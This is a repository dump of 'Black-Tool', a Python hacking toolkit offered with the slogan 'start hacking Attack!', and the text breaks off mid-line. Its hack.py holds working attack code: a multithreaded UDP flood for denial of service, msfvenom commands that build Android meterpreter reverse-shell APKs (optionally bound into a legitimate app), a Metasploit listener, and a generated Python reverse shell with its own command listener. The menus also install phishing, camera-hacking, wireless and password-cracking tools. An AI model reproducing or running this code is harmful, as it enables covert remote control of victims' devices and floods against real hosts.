├── .github └── FUNDING.yml ├── Core ├── Github-Logo.png ├── Pinterest-Logo.png ├── Version.txt ├── index.html ├── instagram.png └── style.css ├── LICENSE ├── README.md ├── Scr ├── Black_Tool_Banner_Pictures.jpeg ├── Black_Tool_Logo.png ├── black-tool-scr-2.png ├── black-tool-scr.png └── black.png ├── Version └── Version.txt ├── banner └── Black-Tool-banner.txt ├── black.png ├── hack.py ├── install.sh └── requirements.txt /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # Mr.Programmer2938 2 | 3 | github: https://github.com/mrprogrammer2938 4 | Instagram: https://instagram/mrprogrammer2938 5 | Pinterest: https://www.pinterest.com/mrprogrammer2938 6 | -------------------------------------------------------------------------------- /Core/Github-Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Core/Github-Logo.png -------------------------------------------------------------------------------- /Core/Pinterest-Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Core/Pinterest-Logo.png -------------------------------------------------------------------------------- /Core/Version.txt: -------------------------------------------------------------------------------- 1 | Black-Tool v4.0.0 2 | -------------------------------------------------------------------------------- /Core/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Black-Tool 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |

Black-Tool


13 | 36 |
37 |
38 |
39 | 40 | Black-Tool Scr 41 |

42 |
43 |
44 |

45 | 46 | Mr.nope


47 | 48 | instagram logo 49 | 50 | 51 | github logo 52 | 53 | 54 | Pinterest 55 |
56 |
57 | 58 |

59 |

60 |

61 | 62 | GitLab 63 |


64 |
65 | 66 | 67 | -------------------------------------------------------------------------------- /Core/instagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Core/instagram.png -------------------------------------------------------------------------------- /Core/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | Black-Tool 3 | */ 4 | 5 | body { 6 | background-color: antiquewhite 7 | } 8 | 9 | color1 { 10 | color: green; 11 | } 12 | 13 | color2 { 14 | color: cornflowerblue; 15 | } 16 | 17 | color3 { 18 | color: blanchedalmond; 19 | } 20 | 21 | color4 { 22 | color: darkslategrey; 23 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Mr.programmer2938 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 8 |
9 | 10 | # [Black-Tool](https://github.com/mrprogrammer2938/Black-Tool) 11 |
12 | 13 |
14 | 17 | 18 |
19 | 20 | Black-Tool logo 21 | 22 |

23 | 24 | 25 | ```Black-Tool v5.5.5 (New)``` 26 |
27 | 28 | [![Python 3.12](https://img.shields.io/badge/Python-3.12-yellow.svg)](https://www.python.org/downloads/) 29 | 30 | #### Install the tools and start hacking Attack! 31 | 32 | [Black-Tool](https://github.com/mrprogrammer2938/Black-Tool) 33 | 34 |
35 | 36 | ``` 37 | ███████████ ████ █████ ███████████ ████ 38 | ░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ 39 | ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ 40 | ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ 41 | ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ 42 | ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ 43 | ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ 44 | ░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ 45 | 46 | ``` 47 |
48 |
49 | 50 | ### This Program write by [Sina Coder](https://github.com/mrprogrammer2938) 51 |
52 | 53 | | Link | Version | Suport | 54 | |:------|:-------:|------:| 55 | | [Black-Tool](https://github.com/mrprogrammer2938/black-tool) | v5.5.5 | (Linux,Windows,MacOS) | 56 | | [Black-Tool](https://github.com/Black-Tool/Black-Tool) | v2.6.5 | (Linux,MacOS) | 57 | 58 |
59 |
60 | 61 | ## Scr 62 |
63 | 64 | [![Black-Tool-Screen](https://github.com/mrprogrammer2938/Black-Tool/blob/master/Scr/black-tool-scr.png)](https://github.com/mrprogrammer2938/Black-Tool) 65 | 66 | [![Black-Tool-Screen2](https://github.com/mrprogrammer2938/Black-Tool/blob/master/Scr/black-tool-scr-2.png)](https://github.com/mrprogrammer2938/Black-Tool) 67 | 68 |
69 | 70 | ## Black-Tool Tools 71 |
72 | 73 | #### Information-Gathering 74 | - Nmap 75 | - [WPScan](https://github.com/wpscanteam/wpscan) 76 | - [Setoolkit](https://github.com/trustedsec/social-engineer-toolkit) 77 | - [Web Info](https://github.com/zahidin/web-information-gathering) 78 | - [CMS Scanner](https://github.com/ajinabraham/CMSScan) 79 | 80 | #### Web Hacking 81 | - [Brutex](https://github.com/1N3/BruteX) 82 | - [SkipFish](https://github.com/spinkham/skipfish) 83 | - [Blazy](https://github.com/s0md3v/Blazy) 84 | - PortScanner 85 | 86 | #### Cam Hacker 87 | - [Cam Hackers](https://github.com/AngelSecurityTeam/Cam-Hackers) 88 | - [Cam Dumper](https://github.com/erfannoori/Cam-Dumper) 89 | - [SEE U](https://github.com/GloveB/Cam-Hack) 90 | - [Cam Phish](https://github.com/baradatipu/CamPhish) 91 | 92 | 93 | #### Wirless Attack 94 | - [Reaver](https://github.com/t6x/reaver-wps-fork-t6x) 95 | - [Wifite](https://github.com/derv82/wifite) 96 | - [Airattackit](https://github.com/JoyGhoshs/Airattackit) 97 | 98 | #### Password Attack 99 | - [Cupp](https://github.com/Mebus/cupp) 100 | - [NCrack](https://github.com/nmap/ncrack) 101 | 102 | #### Dos 103 | - Dos 104 | 105 | #### Malware 106 | - Android 107 | - Windows 108 | 109 | #### Sniffing Spoofing 110 | - [Say Cheese](https://github.com/hangetzzu/saycheese) 111 | - [PyPhisher](https://github.com/KasRoudra2/PyPhisher) 112 | - [Storm-Breaker](https://github.com/ultrasecurity/Storm-Breaker) 113 | - [Setoolkit](https://github.com/trustedsec/social-engineer-toolkit) 114 | 115 |

116 | 117 | ### Installing View [Youtube](https://youtu.be/qPVos1R05vo) 118 | 119 | **Installing** 120 | 121 |
122 | git clone https://github.com/mrprogrammer2938/black-tool
123 | 
124 | cd Black-Tool
125 | 
126 | bash install.sh
127 | 
128 |
129 | 130 | *Run* 131 | ``` sh 132 | python3 hack 133 | ``` 134 | 135 | 136 | ### Black-Tool [Developer](https://github.com/mrprogrammer2938/Black-Tool/tree/master/Developer) 137 | 138 | #### Black-Tool [Help](https://github.com/mrprogrammer2938/Black-Tool/tree/master/Help) 139 |
140 | 141 | #### What is Black-Tool? 142 | 143 | #### [Read](https://github.com/mrprogrammer2938/Black-Tool-Read)... 144 | 145 | #### [Github.Io](https://mrprogrammer2938.github.io/Black-Tool) 146 |
147 | 148 | ### Download [Black-Webbrowser](https://github.com/black-software-Com/Black-Webbrowser) Now! 149 | 150 | ##### If you want to become a Black-Team member 151 | 152 | ###### Email us 153 | 154 | ``` txt 155 | gg1504722@gmail.com 156 | mrprogrammer2938@gmail.com 157 | ``` 158 |
159 | 160 | ### [Mr.nope](https://github.com/mrprogrammer2938) Account... 161 | 162 | [Instagram](https://instagram.com/sina.coder) 163 | 164 | [Pinterest](https://www.pinterest.com/mrprogrammer2938) 165 | 166 | 167 |
168 | 169 | -------------------------------------------------------------------------------- /Scr/Black_Tool_Banner_Pictures.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Scr/Black_Tool_Banner_Pictures.jpeg -------------------------------------------------------------------------------- /Scr/Black_Tool_Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Scr/Black_Tool_Logo.png -------------------------------------------------------------------------------- /Scr/black-tool-scr-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Scr/black-tool-scr-2.png -------------------------------------------------------------------------------- /Scr/black-tool-scr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Scr/black-tool-scr.png -------------------------------------------------------------------------------- /Scr/black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/Scr/black.png -------------------------------------------------------------------------------- /Version/Version.txt: -------------------------------------------------------------------------------- 1 | Black-Tool v5.5.5 2 | -------------------------------------------------------------------------------- /banner/Black-Tool-banner.txt: -------------------------------------------------------------------------------- 1 | ███████████ ████ █████ ███████████ ████ 2 | ░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ 3 | ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ 4 | ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ 5 | ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ 6 | ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ 7 | ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ 8 | ░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ 9 | -------------------------------------------------------------------------------- /black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrprogrammer2938/Black-Tool/466ed29478a58eb41d58575d45b9d922c403e16b/black.png -------------------------------------------------------------------------------- /hack.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | # Black-Tool v5.5.5 3 | # This Tool Made By Sina Meysami 4 | # 5 | 6 | import os,sys,subprocess,time,socket,random,threading 7 | from platform import system 8 | from art import text2art 9 | from colorama import Fore,Back,Style,init 10 | 11 | init() 12 | 13 | class Black_Tool(): 14 | def main_menu(self): 15 | self.clear() 16 | self.banner() 17 | self.menu() 18 | def menu(self): 19 | print("\n") 20 | print("{1}.Information Gathering") 21 | print("{2}.Password Attack") 22 | print("{3}.Wireless Attack") 23 | print("{4}.Sniffing & Spoofing") 24 | print("{5}.Web Attack") 25 | print("{6}.Malware") 26 | print("{7}.Dos Attack") 27 | print("{8}.Cam Hacking") 28 | print("{0}.About") 29 | print("{99}.Exit") 30 | command = str(input(Style.BRIGHT + "\nBlack-Tool# ")) 31 | if (command=="1"): 32 | self.information_gathering() 33 | elif (command=="2"): 34 | self.password_attack() 35 | elif (command=="3"): 36 | self.wireless_attack() 37 | elif (command=="4"): 38 | self.sniffing_spoofing() 39 | elif (command=="5"): 40 | self.web_attack() 41 | elif (command=="6"): 42 | self.malware() 43 | elif (command=="7"): 44 | self.dos() 45 | elif (command=="8"): 46 | self.cam_hacking() 47 | elif (command=="0"): 48 | self.about() 49 | elif (command=="99" or command=="exit" or command=="quit"): 50 | self.exit_blacktool() 51 | else: 52 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 53 | time.sleep(0.5) 54 | try_ = input("Press Enter...") 55 | self.main_menu() 56 | def information_gathering(self): 57 | self.clear() 58 | self.banner() 59 | print("\n{1}.Nmap") 60 | print("{2}.WPScan") 61 | print("{3}.Setoolkit") 62 | print("{4}.Web Info") 63 | print("{5}.CMS Scanner") 64 | print("{99}.Back") 65 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Information-Gathering# ")) 66 | 67 | if command == "1": 68 | self.clear() 69 | print("Installing Nmap") 70 | nmap_ins = subprocess.getoutput("apt install nmap") 71 | print(nmap_ins) 72 | input("Press Enter...") 73 | self.information_gathering() 74 | elif command == "2": 75 | self.clear() 76 | print("Installing WPScan") 77 | wpscan_ins = subprocess.getoutput("git clone https://github.com/wpscanteam/wpscan") 78 | input("Press Enter...") 79 | self.information_gathering() 80 | 81 | elif command == "3": 82 | self.clear() 83 | print("Installing Setoolkit") 84 | install_set = subprocess.getoutput("git clone https://github.com/trustedsec/social-engineer-toolkit") 85 | input("Press Enter...") 86 | self.information_gathering() 87 | elif command == "4": 88 | self.clear() 89 | print("Installing Web Info") 90 | webinfo_ins = subprocess.getoutput("git clone https://github.com/zahidin/web-information-gathering") 91 | input("Press Enter...") 92 | self.information_gathering() 93 | elif command == "5": 94 | self.clear() 95 | print("Installing CMS Scanner") 96 | cmsscanner_ins = subprocess.getoutput("git clone https://github.com/ajinabraham/CMSScan") 97 | input("Press Enter...") 98 | self.information_gathering() 99 | elif command == "99": 100 | self.main_menu() 101 | else: 102 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 103 | time.sleep(0.5) 104 | try_ = input("Press Enter...") 105 | self.information_gathering() 106 | def password_attack(self): 107 | self.clear() 108 | self.banner() 109 | print("\n{1}.Cupp") 110 | print("{2}.NCrack") 111 | print("{99}.Back") 112 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Password-Attack# ")) 113 | if command == "1": 114 | self.clear() 115 | print("Installing Cupp") 116 | cupp_ins = subprocess.getoutput("git clone https://github.com/Mebus/cupp") 117 | print("Press Enter...") 118 | self.password_attack() 119 | elif command == "2": 120 | self.clear() 121 | print("Installing NCrack") 122 | ncrack_ins = subprocess.getoutput("git clone https://github.com/nmap/ncrack") 123 | input("Press Enter...") 124 | self.password_attack() 125 | elif command == "99": 126 | self.main_menu() 127 | else: 128 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 129 | time.sleep(0.5) 130 | try_ = input("Press Enter...") 131 | self.password_attack() 132 | def wireless_attack(self): 133 | self.clear() 134 | self.banner() 135 | print("\n{1}.Reaver") 136 | print("{2}.Wifite") 137 | print("{3}.Airattackit") 138 | print("{99}.Back") 139 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Wireless-Attack# ")) 140 | if command == "1": 141 | self.clear() 142 | print("Installing Reaver") 143 | reaver_ins = subprocess.getoutput("git clone https://github.com/t6x/reaver-wps-fork-t6x reaver/") 144 | input("Press Enter...") 145 | self.wireless_attack() 146 | elif command == "2": 147 | self.clear() 148 | print("Installing Wifite") 149 | wifite_ins = subprocess.getoutput("git clone https://github.com/derv82/wifite") 150 | input("Press Enter...") 151 | self.wireless_attack() 152 | elif command == "3": 153 | self.clear() 154 | print("Installing Airattackit") 155 | airattackit_ins = subprocess.getoutput("git clone https://github.com/JoyGhoshs/Airattackit") 156 | input("Press Enter...") 157 | self.wireless_attack() 158 | elif command == "99": 159 | self.main_menu() 160 | else: 161 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 162 | time.sleep(0.5) 163 | try_ = input("Press Enter...") 164 | self.wireless_attack() 165 | def sniffing_spoofing(self): 166 | self.clear() 167 | self.banner() 168 | print("\n{1}.Say Cheese") 169 | print("{2}.PyPhisher") 170 | print("{3}.Storm-Breaker") 171 | print("{4}.Setoolkit") 172 | print("{99}.Back") 173 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Sniffing_Spoofing# ")) 174 | if command == "1": 175 | self.clear() 176 | print("Installing Say Cheese") 177 | reaver_ins = subprocess.getoutput("git clone https://github.com/hangetzzu/saycheese") 178 | input("Press Enter...") 179 | self.sniffing_spoofing() 180 | elif command == "2": 181 | self.clear() 182 | print("Installing PyPhisher") 183 | wifite_ins = subprocess.getoutput("git clone https://github.com/KasRoudra2/PyPhisher") 184 | input("Press Enter...") 185 | self.sniffing_spoofing() 186 | elif command == "3": 187 | self.clear() 188 | print("Installing Storm-Breaker") 189 | airattackit_ins = subprocess.getoutput("git clone https://github.com/ultrasecurity/Storm-Breaker") 190 | input("Press Enter...") 191 | self.sniffing_spoofing() 192 | elif command == "4": 193 | self.clear() 194 | print("Installing Setoolkit") 195 | set_ins = subprocess.getoutput("git clone https://github.com/trustedsec/social-engineer-toolkit") 196 | input("Press Enter...") 197 | self.sniffing_spoofing() 198 | elif command == "99": 199 | self.main_menu() 200 | else: 201 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 202 | time.sleep(0.5) 203 | try_ = input("Press Enter...") 204 | self.sniffing_spoofing() 205 | def wireless_attack(self): 206 | self.clear() 207 | self.banner() 208 | print("\n{1}.Reaver") 209 | print("{2}.Wifite") 210 | print("{3}.Airattackit") 211 | print("{99}.Back") 212 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Wireless-Attack# ")) 213 | if command == "1": 214 | self.clear() 215 | print("Installing Reaver") 216 | reaver_ins = subprocess.getoutput("git clone https://github.com/t6x/reaver-wps-fork-t6x reaver/") 217 | input("Press Enter...") 218 | self.wireless_attack() 219 | elif command == "2": 220 | self.clear() 221 | print("Installing Wifite") 222 | wifite_ins = subprocess.getoutput("git clone https://github.com/derv82/wifite") 223 | input("Press Enter...") 224 | self.wireless_attack() 225 | elif command == "3": 226 | self.clear() 227 | print("Installing Airattackit") 228 | airattackit_ins = subprocess.getoutput("git clone https://github.com/JoyGhoshs/Airattackit") 229 | input("Press Enter...") 230 | self.wireless_attack() 231 | elif command == "99": 232 | self.main_menu() 233 | else: 234 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 235 | time.sleep(0.5) 236 | try_ = input("Press Enter...") 237 | self.wireless_attack() 238 | def sniffing_spoofing(self): 239 | self.clear() 240 | self.banner() 241 | print("\n{1}.Say Cheese") 242 | print("{2}.PyPhisher") 243 | print("{3}.Storm-Breaker") 244 | print("{4}.Setoolkit") 245 | print("{99}.Back") 246 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Sniffing_Spoofing# ")) 247 | if command == "1": 248 | self.clear() 249 | print("Installing Say Cheese") 250 | reaver_ins = subprocess.getoutput("git clone https://github.com/hangetzzu/saycheese") 251 | input("Press Enter...") 252 | self.sniffing_spoofing() 253 | elif command == "2": 254 | self.clear() 255 | print("Installing PyPhisher") 256 | wifite_ins = subprocess.getoutput("git clone https://github.com/KasRoudra2/PyPhisher") 257 | input("Press Enter...") 258 | self.sniffing_spoofing() 259 | elif command == "3": 260 | self.clear() 261 | print("Installing Storm-Breaker") 262 | airattackit_ins = subprocess.getoutput("git clone https://github.com/ultrasecurity/Storm-Breaker") 263 | input("Press Enter...") 264 | self.sniffing_spoofing() 265 | elif command == "4": 266 | self.clear() 267 | print("Installing Setoolkit") 268 | set_ins = subprocess.getoutput("git clone https://github.com/trustedsec/social-engineer-toolkit") 269 | input("Press Enter...") 270 | self.sniffing_spoofing() 271 | elif command == "99": 272 | self.main_menu() 273 | else: 274 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 275 | time.sleep(0.5) 276 | try_ = input("Press Enter...") 277 | self.sniffing_spoofing() 278 | def web_attack(self): 279 | self.clear() 280 | self.banner() 281 | print("\n{1}.BruteX") 282 | print("{2}.SkipFish") 283 | print("{3}.Blazy") 284 | print("{4}.PortScanner") 285 | print("{99}.Back") 286 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Web-Hacking# ")) 287 | if command == "1": 288 | self.clear() 289 | print("Installing BruteX") 290 | cupp_ins = subprocess.getoutput("git clone https://github.com/1N3/BruteX") 291 | print("Press Enter...") 292 | self.web_attack() 293 | elif command == "2": 294 | self.clear() 295 | print("Installing SkipFish") 296 | ncrack_ins = subprocess.getoutput("git clone https://github.com/spinkham/skipfish") 297 | input("Press Enter...") 298 | self.web_attack() 299 | elif command == "3": 300 | self.clear() 301 | print("Installing Blazy") 302 | ncrack_ins = subprocess.getoutput("git clone https://github.com/s0md3v/Blazy") 303 | input("Press Enter...") 304 | self.web_attack() 305 | elif command == "4": 306 | self.portscan() 307 | elif command == "99": 308 | self.main_menu() 309 | else: 310 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 311 | time.sleep(0.5) 312 | try_ = input("Press Enter...") 313 | self.web_attack() 314 | def malware(self): 315 | self.clear() 316 | self.banner() 317 | print("\n{1}.Android") 318 | print("{2}.Windows") 319 | print("{99}.Main Menu") 320 | command = str(input(Style.BRIGHT + "\nBlack-Tool# ")) 321 | if command == "1": 322 | self.android_mal() 323 | elif command == "2": 324 | self.windows_mal() 325 | elif command == "99": 326 | self.main_menu() 327 | else: 328 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 329 | time.sleep(0.5) 330 | try_ = input("Press Enter...") 331 | self.malware() 332 | def dos(self): 333 | self.clear() 334 | self.banner() 335 | try: 336 | host = input("\nEnter Host: ") 337 | ip = socket.gethostbyname(host) 338 | port = input("Enter Port: ") 339 | time.sleep(1) 340 | self.clear() 341 | print(f"{Fore.GREEN} Ip: {Fore.RED}{ip}{Fore.WHITE}") 342 | time.sleep(1) 343 | print(f"\n{Fore.GREEN} Port: {Fore.RED}{port}{Fore.WHITE}") 344 | time.sleep(2) 345 | UDP_PORT = port 346 | bs = random._urandom(1490) 347 | sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 348 | def run(k): 349 | while True: 350 | sock.sendto(bs,(ip,int(port))) 351 | print(f"{Fore.GREEN}Send Packet To {Fore.RED}{ip}{Fore.WHITE}") 352 | for i in range(10): 353 | ch = threading.Thread(target=run, args=[i]) 354 | ch.start() 355 | except KeyboardInterrupt: 356 | print("Ctrl + C\nDos Stopped!") 357 | while True: 358 | try_6 = input("\nTry Dos? [y/n] ") 359 | if try_6 == "y": 360 | self.dos() 361 | elif try_6 == "n": 362 | break 363 | else: 364 | continue 365 | self.main_menu() 366 | 367 | def cam_hacking(self): 368 | self.clear() 369 | self.banner() 370 | print("\n{1}.Cam Hacker") 371 | print("{2}.Cam Dumper") 372 | print("{3}.SEE U") 373 | print("{4}.Cam Phish") 374 | print("{99}.Back") 375 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Camera-Hacking# ")) 376 | if command == "1": 377 | self.clear() 378 | print("Installing Cam Hacker") 379 | reaver_ins = subprocess.getoutput("git clone https://github.com/ANGELSECURITYTEAM/cam-hackers") 380 | input("Press Enter...") 381 | self.cam_hacking() 382 | elif command == "2": 383 | self.clear() 384 | print("Installing Cam Dumper") 385 | wifite_ins = subprocess.getoutput("git clone https://github.com/erfannoori/Cam-Dumper") 386 | input("Press Enter...") 387 | self.cam_hacking() 388 | elif command == "3": 389 | self.clear() 390 | print("Installing See U") 391 | airattackit_ins = subprocess.getoutput("git clone https://github.com/GloveB/Cam-Hack SEE-U/") 392 | input("Press Enter...") 393 | self.cam_hacking() 394 | elif command == "4": 395 | self.clear() 396 | print("Installing Cam Phish") 397 | camphish_ins = subprocess.getoutput("git clone https://github.com/baradatipu/CamPhish") 398 | input("Press Enter...") 399 | self.cam_hacking() 400 | elif command == "99": 401 | self.main_menu() 402 | else: 403 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 404 | time.sleep(0.5) 405 | try_ = input("Press Enter...") 406 | self.cam_hacking() 407 | def portscan(self): 408 | self.clear() 409 | self.banner() 410 | host = input("\nEnter Host: ") 411 | ip = socket.gethostbyname(host) 412 | print(f"\n{host} IP: {ip}\n") 413 | print("\n") 414 | ports = [21,22,25,80,443] 415 | for port in ports: 416 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 417 | socket.setdefaulttimeout(1) 418 | s.connect_ex((ip,port)) 419 | if (s == 0): 420 | print(f"{port} Is Open!") 421 | else: 422 | print(f"{port} Is Filter!") 423 | s.close() 424 | try_ = input("\nTry Again? [y/n] ") 425 | if try_ == "y": 426 | self.portscan() 427 | else: 428 | print("\nPress Enter...") 429 | self.main_menu() 430 | def android_mal(self): 431 | self.clear() 432 | self.banner() 433 | print("\n{1}.Make Payload") 434 | print("{2}.Start Listener") 435 | print("{99}.Main Menu") 436 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Malware/Android# ")) 437 | if command == "1": 438 | self.android_payload() 439 | elif command == "2": 440 | self.android_listener() 441 | elif command == "99": 442 | self.main_menu() 443 | else: 444 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 445 | time.sleep(0.5) 446 | try_ = input("Press Enter...") 447 | self.android_mal() 448 | 449 | def android_payload(self): 450 | self.clear() 451 | self.banner() 452 | host = input("\nEnter IP: ") 453 | port = input("Enter Port: ") 454 | payload_name = input("Enter Payload Name: ") 455 | while True: 456 | bind_q = input("Do You Have A Orginal File? [y/n] ") 457 | if bind_q == "y": 458 | orginal_file = input("Enter Orginal File: ") 459 | make_payload = subprocess.getoutput(f"msfvenom -x {orginal_file} -p android/meterpreter/reverse_tcp LHOST={host} LPORT={port} -o {payload_name}.apk") 460 | print(make_payload) 461 | break 462 | elif bind_q == "n": 463 | make_payload = subprocess.getoutput(f"msfvenom -p android/meterpreter/reverse_tcp LHOST={host} LPORT={port} -o {payload_name}.apk") 464 | print(make_payload) 465 | break 466 | else: continue 467 | while True: 468 | try_2 = input("Make Payload Again? [y/n] ") 469 | if try_2 == "y": 470 | self.android_payload() 471 | elif try_2 == "n": 472 | break 473 | else: 474 | continue 475 | self.main_menu() 476 | def android_listener(self): 477 | self.clear() 478 | self.banner() 479 | host = input("\nEnter Host: ") 480 | port = input("Enter Port: ") 481 | os.system(f"msfconsole -x 'use multi/handler; set LHOST {host}; set LPORT {port}; set PAYLOAD android/meterpreter/reverse_tcp; exploit'") 482 | while True: 483 | try_3 = input("Try Listener Again? [y/n] ") 484 | if try_3 == "y": 485 | self.android_listener() 486 | break 487 | elif try_3 == "n": 488 | break 489 | else: 490 | continue 491 | self.android_mal() 492 | def windows_mal(self): 493 | self.clear() 494 | self.banner() 495 | print("\n{1}.Make Payload") 496 | print("{2}.Start Listener") 497 | print("{99}.Main Menu") 498 | command = str(input(Style.BRIGHT + "\nBlack-Tool/Malware/Windows# ")) 499 | if command == "1": 500 | self.windows_payload() 501 | elif command == "2": 502 | self.windows_listener() 503 | elif command == "99": 504 | self.main_menu() 505 | else: 506 | print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") 507 | time.sleep(0.5) 508 | try_ = input("Press Enter...") 509 | self.windows_mal() 510 | def windows_payload(self): 511 | self.clear() 512 | self.banner() 513 | host = input("\nEnter Host: ") 514 | port = input("Enter Port: ") 515 | 516 | payload_name = input("Enter Payload Name: ") 517 | payload_code = f""" 518 | from socket import * 519 | from subprocess import getoutput 520 | s = socket(2,1) 521 | 522 | s.connect(('{host}',{port})) 523 | 524 | print('Connected!') 525 | 526 | while True: 527 | try: 528 | data = s.recv(123456789).decode() 529 | result = getoutput(data) 530 | s.send(result.encode()) 531 | except: 532 | pass 533 | s.close() 534 | 535 | """ 536 | f = open(f"{payload_name}.py","w") 537 | f.write(payload_code) 538 | f.close() 539 | # exe_out = subprocess.getoutput(f"pyinstaller --onefile {payload_name}.py --noconsole") 540 | # print(exe_out) 541 | print(f"\nYour Payload {payload_name} Created!\n") 542 | while True: 543 | try_4 = input("Make Payload Again? [y/n] ") 544 | if try_4 == "y": 545 | self.windows_payload() 546 | elif try_4 == "n": 547 | break 548 | else: 549 | continue 550 | self.windows_mal() 551 | 552 | def windows_listener(self,host="",port=""): 553 | self.clear() 554 | self.banner() 555 | host = input("\nEnter Host: ") 556 | port = input("Enter Port: ") 557 | ip = socket.gethostbyname(host) 558 | 559 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 560 | s.bind((host,int(port))) 561 | s.listen(2) 562 | print(f"Start Listener At {ip} Port: {port}") 563 | c,addr = s.accept() 564 | print("Client Connect!") 565 | print("\nEnter Q To Exit!\n") 566 | while True: 567 | command = input(f"{ip}/$ ").encode() 568 | if command == "q" or command == "Q": 569 | c.close() 570 | else: 571 | c.send(command) 572 | data = c.recv(123456789).decode() 573 | print(data) 574 | c.close() 575 | while True: 576 | try_5 = input("Try Listener? [y/n] ") 577 | if try_5 == "y": 578 | self.windows_listener() 579 | elif try_5 == "n": 580 | break 581 | else: 582 | continue 583 | self.windows_mal() 584 | def about(self): 585 | self.clear() 586 | sina_art = text2art("Sina Coder","tarty1") 587 | print(sina_art) 588 | print(f"\n{Fore.GREEN}This Tool Made by Sina Coder") 589 | time.sleep(0.5) 590 | print(f"\nGithub: https://github.com/mrprogrammer2938") 591 | time.sleep(0.5) 592 | print(f"\nInstagram: 